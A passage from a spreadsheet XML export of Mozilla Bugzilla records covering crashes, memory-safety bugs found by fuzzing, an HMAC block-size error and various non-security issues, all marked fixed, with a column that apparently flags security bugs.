          <t>Libraries</t>
        </is>
      </c>
      <c r="K930" t="inlineStr">
        <is>
          <t>3.9</t>
        </is>
      </c>
      <c r="L930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N930" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P930" t="inlineStr"/>
      <c r="Q930" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R930" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S930" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="T930" t="n">
        <v>1</v>
      </c>
      <c r="U930" t="n">
        <v>0</v>
      </c>
      <c r="V930" t="n">
        <v>11</v>
      </c>
      <c r="W930" t="inlineStr">
        <is>
          <t>Our current HMAC code has a hardcoded 64-byte block
size of the hash algorithm.  While this is correct
for MD2, MD5, SHA-1, and SHA-256, this block size
is wrong for SHA-384 and SHA-512, whose block size is
128 byte.  I believe this is why our HMAC SHA-384
and HMAC SHA-512 results are different from Sun JCE
provider's.
See FIPS 198, Section 2.3 for the definition of B:
block size (in bytes) of the input to the Approved
hash function.
See FIPS 180-2, Figure 1 for the block sizes of the
various SHA-X algorithms.
In alghmac.c, we have
#define HMAC_PAD_SIZE 64
which is the 'B' parameter in the HMAC standard.
This hardcoded constant (and equivalent values such
as sizeof(cx-&gt;ipad) and sizeof(cx-&gt;opad) will need
to be changed to a value that depends on the hash
algorithm.  Unfortunately, the SECRawHashObjects[]
array (or rather the SECHashObject structure) doesn't
contain this information (the input block size of
the hash algorithm).</t>
        </is>
      </c>
      <c r="X930" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="931">
      <c r="A931" t="n">
        <v>804237</v>
      </c>
      <c r="B931" t="inlineStr">
        <is>
          <t>2012-10-22 11:09:56 -0700</t>
        </is>
      </c>
      <c r="C931" t="inlineStr">
        <is>
          <t>Crash [@ nsSOCKSSocketInfo::ConnectToProxy(PRFileDesc*) ] clicking "Download the rest of the message"</t>
        </is>
      </c>
      <c r="D931" t="inlineStr">
        <is>
          <t>2013-04-30 18:41:27 -0700</t>
        </is>
      </c>
      <c r="E931" t="n">
        <v>1</v>
      </c>
      <c r="F931" t="n">
        <v>1</v>
      </c>
      <c r="G931" t="n">
        <v>3</v>
      </c>
      <c r="H931" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I931" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J931" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K931" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L931" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M931" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N931" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P931" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q931" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R931" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S931" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T931" t="n">
        <v>1</v>
      </c>
      <c r="U931" t="n">
        <v>0</v>
      </c>
      <c r="V931" t="n">
        <v>30</v>
      </c>
      <c r="W931" t="inlineStr">
        <is>
          <t>Tbird 16.0.1.
Reliable crash upon clicking "Download the rest of this message."
Crash IDs:
bp-db07a65e-15a7-4b58-bada-b01502121022
bp-a06c34e6-c260-449a-8721-4723c2121022
bp-822a5bd5-ce6d-4c57-8bf0-944732121022</t>
        </is>
      </c>
      <c r="X931" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="932">
      <c r="A932" t="n">
        <v>1144748</v>
      </c>
      <c r="B932" t="inlineStr">
        <is>
          <t>2015-03-18 09:40:48 -0700</t>
        </is>
      </c>
      <c r="C932" t="inlineStr">
        <is>
          <t>Help: Update the help shortcuts with iconic treatment</t>
        </is>
      </c>
      <c r="D932" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E932" t="n">
        <v>1</v>
      </c>
      <c r="F932" t="n">
        <v>1</v>
      </c>
      <c r="G932" t="n">
        <v>7</v>
      </c>
      <c r="H932" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I932" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J932" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K932" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L932" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M932" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N932" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P932" t="inlineStr"/>
      <c r="Q932" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R932" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S932" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T932" t="n">
        <v>1</v>
      </c>
      <c r="U932" t="n">
        <v>0</v>
      </c>
      <c r="V932" t="n">
        <v>7</v>
      </c>
      <c r="W932" t="inlineStr">
        <is>
          <t>It would communicate the Help keyboard shortcuts better if they appeared in the Help as actual keys, rather than just bold letters. This represents that work.
I've already got the update partly underway and it looks awesome.</t>
        </is>
      </c>
      <c r="X932" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="933">
      <c r="A933" t="n">
        <v>1224780</v>
      </c>
      <c r="B933" t="inlineStr">
        <is>
          <t>2015-11-13 18:08:07 -0800</t>
        </is>
      </c>
      <c r="C933" t="inlineStr">
        <is>
          <t>Deploy Push Endpoint server Redshift derived stream nightly job</t>
        </is>
      </c>
      <c r="D933" t="inlineStr">
        <is>
          <t>2015-11-25 12:39:04 -0800</t>
        </is>
      </c>
      <c r="E933" t="n">
        <v>1</v>
      </c>
      <c r="F933" t="n">
        <v>1</v>
      </c>
      <c r="G933" t="n">
        <v>2</v>
      </c>
      <c r="H933" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I933" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J933" t="inlineStr">
        <is>
          <t>Operations: Metrics/Monitoring</t>
        </is>
      </c>
      <c r="K933" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L933" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M933" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N933" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P933" t="inlineStr"/>
      <c r="Q933" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T933" t="n">
        <v>1</v>
      </c>
      <c r="U933" t="n">
        <v>0</v>
      </c>
      <c r="V933" t="n">
        <v>3</v>
      </c>
      <c r="W933" t="inlineStr">
        <is>
          <t>Created attachment 8687496
push_load_bundle.tar.gz
The attached tarball contains everything needed to perform the nightly processing of Push Endpoint server logs (from the `heka-logs` S3 bucket) in order to populate a Redshift derived stream from which usage metrics can be generated.
The tarball is meant to be untarred in the `ec2-user` home folder on a fresh Centos 7 instance (tested with ami-bb2b238b). This will extract a `push_load` folder, which contains a `push_load.sh` script that, when run, will install all needed RPMs and run the hindsight_cli job that performs the desired operation.
The only thing not covered by the script is permissions. Access to the `heka-logs` AWS S3 bucket and the Push production Redshift db must be specified. Instructions on where to set the Redshift credentials are included in the comments of the `push_load.sh` script.
This job should be run once per day. It presumes that the *previous* day's autopush log files have been processed by the Heka aggregator and are in place in the S3 bucket.</t>
        </is>
      </c>
      <c r="X933" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="934">
      <c r="A934" t="n">
        <v>96677</v>
      </c>
      <c r="B934" t="inlineStr">
        <is>
          <t>2001-08-23 11:16:58 -0700</t>
        </is>
      </c>
      <c r="C934" t="inlineStr">
        <is>
          <t>Shadow directory no longer exists.</t>
        </is>
      </c>
      <c r="D934" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E934" t="n">
        <v>1</v>
      </c>
      <c r="F934" t="n">
        <v>1</v>
      </c>
      <c r="G934" t="n">
        <v>4</v>
      </c>
      <c r="H934" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I934" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J934" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K934" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L934" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M934" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N934" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P934" t="inlineStr"/>
      <c r="Q934" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R934" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S934" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T934" t="n">
        <v>1</v>
      </c>
      <c r="U934" t="n">
        <v>0</v>
      </c>
      <c r="V934" t="n">
        <v>5</v>
      </c>
      <c r="W934" t="inlineStr">
        <is>
          <t>FAQ A.8.9 refers to the shadow directory.  It no longer exists.
Is this section even accurate, given bug #86328?</t>
        </is>
      </c>
      <c r="X934" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="935">
      <c r="A935" t="n">
        <v>1242396</v>
      </c>
      <c r="B935" t="inlineStr">
        <is>
          <t>2016-01-25 03:24:40 -0800</t>
        </is>
      </c>
      <c r="C935" t="inlineStr">
        <is>
          <t>[TV 2.5] FxOS TV Metrics - Track "send to TV" usage</t>
        </is>
      </c>
      <c r="D935" t="inlineStr">
        <is>
          <t>2016-01-29 06:42:38 -0800</t>
        </is>
      </c>
      <c r="E935" t="n">
        <v>1</v>
      </c>
      <c r="F935" t="n">
        <v>1</v>
      </c>
      <c r="G935" t="n">
        <v>6</v>
      </c>
      <c r="H935" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I935" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J935" t="inlineStr">
        <is>
          <t>Gaia::TV</t>
        </is>
      </c>
      <c r="K935" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L935" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M935" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N935" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P935" t="inlineStr">
        <is>
          <t>[ft:conndevices]</t>
        </is>
      </c>
      <c r="Q935" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R935" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S935" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T935" t="n">
        <v>1</v>
      </c>
      <c r="U935" t="n">
        <v>0</v>
      </c>
      <c r="V935" t="n">
        <v>14</v>
      </c>
      <c r="W935" t="inlineStr">
        <is>
          <t>We need to track "send to TV" usage.</t>
        </is>
      </c>
      <c r="X935" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="936">
      <c r="A936" t="n">
        <v>978652</v>
      </c>
      <c r="B936" t="inlineStr">
        <is>
          <t>2014-03-02 19:39:22 -0800</t>
        </is>
      </c>
      <c r="C936" t="inlineStr">
        <is>
          <t>Navigating while new Workers are queued causes all kinds of trouble</t>
        </is>
      </c>
      <c r="D936" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:04 -0700</t>
        </is>
      </c>
      <c r="E936" t="n">
        <v>1</v>
      </c>
      <c r="F936" t="n">
        <v>1</v>
      </c>
      <c r="G936" t="n">
        <v>3</v>
      </c>
      <c r="H936" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I936" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J936" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K936" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L936" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M936" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N936" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P936" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main30+]</t>
        </is>
      </c>
      <c r="Q936" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R936" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S936" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T936" t="n">
        <v>1</v>
      </c>
      <c r="U936" t="n">
        <v>0</v>
      </c>
      <c r="V936" t="n">
        <v>10</v>
      </c>
      <c r="W936" t="inlineStr">
        <is>
          <t>Created attachment 8384407
testcase
When I load the testcase, one or more things goes wrong:
Crash [@ PresShell::ClearImageVisibilityVisited]
###!!! ASSERTION: This is unsafe! Fix the caller!: 'Error', file dom/events/nsEventDispatcher.cpp, line 447
[Exception... "Component returned failure code: 0x80570027 (NS_ERROR_XPC_SECURITY_MANAGER_VETO) [nsIDOMJSWindow.frames]"  nsresult: "0x80570027 (NS_ERROR_XPC_SECURITY_MANAGER_VETO)"  location: "JS frame :: resource://app/modules/sessionstore/FrameTree.jsm :: walk :: line 136"  data: no]
###!!! ABORT: How did we get here?  Are we failing to notify listeners that we should notify?: 'mDocument-&gt;IsBeingUsedAsImage()', file layout/base/nsPresContext.cpp, line 1909
JavaScript error: chrome://browser/content/tabbrowser.xml, line 3163: NS_ERROR_NOT_INITIALIZED: Component not initialized</t>
        </is>
      </c>
      <c r="X936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="937">
      <c r="A937" t="n">
        <v>1379842</v>
      </c>
      <c r="B937" t="inlineStr">
        <is>
          <t>2017-07-10 16:34:45 -0700</t>
        </is>
      </c>
      <c r="C937" t="inlineStr">
        <is>
          <t>Web content can open local files by hooking drag and drop to outside of content</t>
        </is>
      </c>
      <c r="D937" t="inlineStr">
        <is>
          <t>2018-02-01 17:25:37 -0800</t>
        </is>
      </c>
      <c r="E937" t="n">
        <v>1</v>
      </c>
      <c r="F937" t="n">
        <v>1</v>
      </c>
      <c r="G937" t="n">
        <v>3</v>
      </c>
      <c r="H937" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I937" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J937" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K937" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N937" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P937" t="inlineStr">
        <is>
          <t>[domsecurity-backlog2][adv-main56+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q937" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R937" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S937" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T937" t="n">
        <v>1</v>
      </c>
      <c r="U937" t="n">
        <v>0</v>
      </c>
      <c r="V937" t="n">
        <v>38</v>
      </c>
      <c r="W937" t="inlineStr">
        <is>
          <t>separated from bug 1370843 and bug 1379838 (see bug 1379838 for details)
(just in case, not adding related bugs to "Blocks" to avoid hint)
Steps To Reproduce:
  1. open Nightly with e10s enabled
  2. open the attached HTML
  3. select "THIS" text in the file
  4. drag and drop the text to empty area of tabs bar
Actual result:
  a new tab for local file is opened
Expected result:
  maybe prevent it</t>
        </is>
      </c>
      <c r="X937" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="938">
      <c r="A938" t="n">
        <v>1256968</v>
      </c>
      <c r="B938" t="inlineStr">
        <is>
          <t>2016-03-15 14:00:38 -0700</t>
        </is>
      </c>
      <c r="C938" t="inlineStr">
        <is>
          <t>hunspell: heap-buffer-overflow write in [@u16_u8]</t>
        </is>
      </c>
      <c r="D938" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:22 -0700</t>
        </is>
      </c>
      <c r="E938" t="n">
        <v>1</v>
      </c>
      <c r="F938" t="n">
        <v>1</v>
      </c>
      <c r="G938" t="n">
        <v>3</v>
      </c>
      <c r="H938" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I938" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J938" t="inlineStr">
        <is>
          <t>Spelling checker</t>
        </is>
      </c>
      <c r="K938" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P938" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q938" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R938" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S938" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T938" t="n">
        <v>1</v>
      </c>
      <c r="U938" t="n">
        <v>0</v>
      </c>
      <c r="V938" t="n">
        <v>7</v>
      </c>
      <c r="W938" t="inlineStr">
        <is>
          <t>Created attachment 8730897
call_stack.txt
Found in hunspell revision ded5b4c62c37084d216154e02e4d5e6efbd3ccfa
To reproduce:
run ./src/tools/example tests/base_utf.aff tests/base_utf.dic test_case.txt
==3129==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f90fe400380 at pc 0x00000057f5c2 bp 0x7ffd8da31a20 sp 0x7ffd8da31a18
WRITE of size 1 at 0x7f90fe400380 thread T0
...</t>
        </is>
      </c>
      <c r="X938" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="939">
      <c r="A939" t="n">
        <v>110250</v>
      </c>
      <c r="B939" t="inlineStr">
        <is>
          <t>2001-11-15 03:45:23 -0800</t>
        </is>
      </c>
      <c r="C939" t="inlineStr">
        <is>
          <t>ebay.de - Not possible to subscribe to ebay!</t>
        </is>
      </c>
      <c r="D939" t="inlineStr">
        <is>
          <t>2015-04-19 23:45:39 -0700</t>
        </is>
      </c>
      <c r="E939" t="n">
        <v>1</v>
      </c>
      <c r="F939" t="n">
        <v>1</v>
      </c>
      <c r="G939" t="n">
        <v>6</v>
      </c>
      <c r="H939" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I939" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J939" t="inlineStr">
        <is>
          <t>German</t>
        </is>
      </c>
      <c r="K939" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L939" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M939" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N939" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P939" t="inlineStr"/>
      <c r="Q939" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R939" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S939" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T939" t="n">
        <v>1</v>
      </c>
      <c r="U939" t="n">
        <v>0</v>
      </c>
      <c r="V939" t="n">
        <v>11</v>
      </c>
      <c r="W939" t="inlineStr">
        <is>
          <t>Environment:
==============
OS: Win NT 4.0 SP-5
Mozilla BuildID:    2001111203
Summary:
=========
With the above mentioned version of Mozilla it#s not possible to make a new
sunscription to ebay.de 
Reproducible: yes
Steps to Reproduce:
====================
1. Start Mozilla &amp; enter www.ebay.de to location bar
2. In the upcoming site click "Anmelden" in the middle-upper part of the window
to make a new subscription
3. On the next site choose "deutschland" in the listbox named "Wählen Sie das
Land aus, in dem Sie Ihren Wohnsitz haben:"
4. leave checkbox for SSL as is - it doesn't matter if its checked or not
5. click [Weiter] to go to the next step
Actual Results:  
================
After a few seconds a page stating that the entered information is wrong appears:
"Fehler bei der Eingabe
In Ihren Eingaben ist ein Fehler. Bitte gehen Sie zurück, und überprüfen Sie, ob
alle Felder ausgefüllt sind."
=&gt; "Your entered data contains errors. Please go back and check, that all fields
have been filled"
Expected Results:  
==================
The next page asking for personal information appears
Additional Information:
========================
Problem does not occur using IE 5.5 and netscape 4.51</t>
        </is>
      </c>
      <c r="X939" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="940">
      <c r="A940" t="n">
        <v>988698</v>
      </c>
      <c r="B940" t="inlineStr">
        <is>
          <t>2014-03-26 19:50:40 -0700</t>
        </is>
      </c>
      <c r="C940" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsThreadManager::RegisterCurrentThread during shutdown</t>
        </is>
      </c>
      <c r="D940" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:46 -0700</t>
        </is>
      </c>
      <c r="E940" t="n">
        <v>1</v>
      </c>
      <c r="F940" t="n">
        <v>1</v>
      </c>
      <c r="G940" t="n">
        <v>3</v>
      </c>
      <c r="H940" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I940" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J940" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K940" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L940" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M940" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N940" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P940" t="inlineStr">
        <is>
          <t>[adv-main38+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q940" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R940" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S940" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T940" t="n">
        <v>1</v>
      </c>
      <c r="U940" t="n">
        <v>0</v>
      </c>
      <c r="V940" t="n">
        <v>40</v>
      </c>
      <c r="W940" t="inlineStr">
        <is>
          <t>Created attachment 8397561
stack_trace.txt
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
At this time we do not have a test case that will reproduce the issue.</t>
        </is>
      </c>
      <c r="X940" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="941">
      <c r="A941" t="n">
        <v>161203</v>
      </c>
      <c r="B941" t="inlineStr">
        <is>
          <t>2002-08-05 18:13:51 -0700</t>
        </is>
      </c>
      <c r="C941" t="inlineStr">
        <is>
          <t>Bug changes with intermediate pages munges fields with multiple values (e.g., CC)</t>
        </is>
      </c>
      <c r="D941" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E941" t="n">
        <v>1</v>
      </c>
      <c r="F941" t="n">
        <v>1</v>
      </c>
      <c r="G941" t="n">
        <v>4</v>
      </c>
      <c r="H941" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I941" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J941" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K941" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N941" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P941" t="inlineStr">
        <is>
          <t>[fixed in 2.16.1] [FIXED ON TRUNK]</t>
        </is>
      </c>
      <c r="Q941" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R941" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S941" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T941" t="n">
        <v>1</v>
      </c>
      <c r="U941" t="n">
        <v>0</v>
      </c>
      <c r="V941" t="n">
        <v>22</v>
      </c>
      <c r="W941" t="inlineStr">
        <is>
          <t>Sometimes, when changing a bug, Bugzilla has to display an intermidiate
page.  Examples include specifying the component/version/milestone when a
product is changed, the user logging in, resolving "mid-air collisions",
and confirming duplicates.
In that intermediate page, Bugzilla needs to save the changes the user
wanted to make.  However, for fields with multiple values, e.g., the CC
lists, these values are munged.  All the values are concatenated together
into one value.
To see this in action, take a bug with CCs.  Change the product
and remove a couple of CCs at the same time, so you get the "verify
component/version/milestone" page.  Once you specify these values, you
get an error, because "user1@domain.comuser2@domain.netuser3@example.org"
is not a registered Bugzilla account.
Note that this was noticed in bug 101056.  But it was only noticed
and fixed for the case where this user has to log in before committing
his change.  It still exists in the other cases.
I discovered this bug in 2.14, but it still exists in 2.16.
I have a fix for this, and I will be submitting them.</t>
        </is>
      </c>
      <c r="X941" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="942">
      <c r="A942" t="n">
        <v>413048</v>
      </c>
      <c r="B942" t="inlineStr">
        <is>
          <t>2008-01-18 17:50:31 -0800</t>
        </is>
      </c>
      <c r="C942" t="inlineStr">
        <is>
          <t>Crash [@ nsFrameList::SortByContentOrder] with -moz-column, float</t>
        </is>
      </c>
      <c r="D942" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E942" t="n">
        <v>1</v>
      </c>
      <c r="F942" t="n">
        <v>1</v>
      </c>
      <c r="G942" t="n">
        <v>3</v>
      </c>
      <c r="H942" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I942" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J942" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K942" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L942" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M942" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N942" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P942" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q942" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R942" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S942" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T942" t="n">
        <v>1</v>
      </c>
      <c r="U942" t="n">
        <v>0</v>
      </c>
      <c r="V942" t="n">
        <v>15</v>
      </c>
      <c r="W942" t="inlineStr">
        <is>
          <t>Created attachment 297903
testcase (crashes Firefox when loaded)
Loading this testcase in a Mac trunk debug build triggers:
